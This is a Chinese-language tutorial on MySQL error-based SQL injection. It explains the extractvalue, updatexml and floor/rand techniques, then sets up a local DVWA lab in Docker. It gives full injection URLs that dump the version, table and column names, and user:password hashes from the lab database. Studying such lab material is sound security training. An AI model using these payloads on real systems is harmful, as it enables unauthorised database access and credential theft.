SQL报错注入

SQL报错注入: 使用SQL语句报错的语法，用于注入结果无回回显但错误信息有输出的情况。
MySQL报错注入主要分为一下几类:

1.BigInt等数据类型溢出；
2.Xpath语法错误；
3.count()+rand()+group_by()导致重复；
4.空间数据类型函数错误。

很多函数会导致MySQL报错并显示出数据：

1.floor函数:返回小于等该值的最大整数。floor(rand(0)*2)报错是有条件的，记录必须3条以上
2.extractvalue函数(最多32字符):使用xpath的语法从xml字符串中获取数据,使用concat函数将想要获得的数据库内容拼接到第二个参数中，报错时作为内容输出。
3.updatexml函数:返回被替换的xml片段，updatexml中存在特殊字符、字母时，会出现报错，报错信息为特殊字符、字母及之后的内容，而hex出的数据包含字母和数字，所以第一个字母前面的内容都会丢失，常与concat组合使用。
4.exp函数。

select count(),(floor(rand(0)2)) as x tables group by x;为什么会报错？
rand()在执行的时候,都会重新计算,会产生不同的数据,在语句的后面使用group by,整个表的数据是按照rand()生成的数据为主键，而插入到临时表中，如果碰到生成(floor(rand(0)*2)) as x的数据和表中的数据重复，就会造成主键重复的报错。

dvwa环境搭建

docker search web-dvwa
docker pull vulnerables/web-dvwa
docker run -d -p 12346:80 vulnerables/web-dvwa

在启动环境之后，输入用户名(admin)和密码(password),登录到系统，进入启动界面，在页面有一个create/reset database 按钮，点击之后，就可以重新登录到页面:

image.png
重新登录系统之后，选择SQL Injection(Bind),进入盲注页面, image.png
在页面中，直接点击提交按钮，页面返回在数据库中没有找到相应的userid，可以尝试有盲注的可能性，
image.png

通过常用盲注的方式，可以进行简单测试，是否可以进行盲注。使用上面提到的方式进行盲注的测试：

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1,(select @@version)) -- &Submit=Submit#

image.png

通过extractvalue函数获取到数据库的版本，使用concat将用户和数据库信息拼接到一起，在使用extractvalue 获取到数据，

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, 
(select user()),0x7e,(select database()))) --  &Submit=Submit#

image.png

可以获取到用户和数据库，从数据库中获取到数据表，以及获取到相应的数据:

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --  &Submit=Submit#

image.png

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --  &Submit=Submit#

image.png

从图中可以看到输出的数据不完整，可以借助limit来获取每一个属性的名称：

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1))) --  &Submit=Submit#

image.png

可以得到users表的字段为:[user_id,first_name,last_name,user,password,avatar,last_login,failed_login]
通过上面的字段可以猜测出来，用户的信息，应该存放在user和password两个字段中,

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select 
concat_ws(':',user,password) from dvwa.users limit 0,1))) --  &Submit=Submit#

image.png

这样获取到的数据有可能会超过字符串长度，需要使用mid函数，

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, mid(concat(0x7e, (select password from dvwa.users limit 0,1)),1,29)) --  &Submit=Submit#

image.png

可以看到获取password的数据,有可能会超过长度限制进行截取，可以多次获取，然后将字段进行拼接,

image.png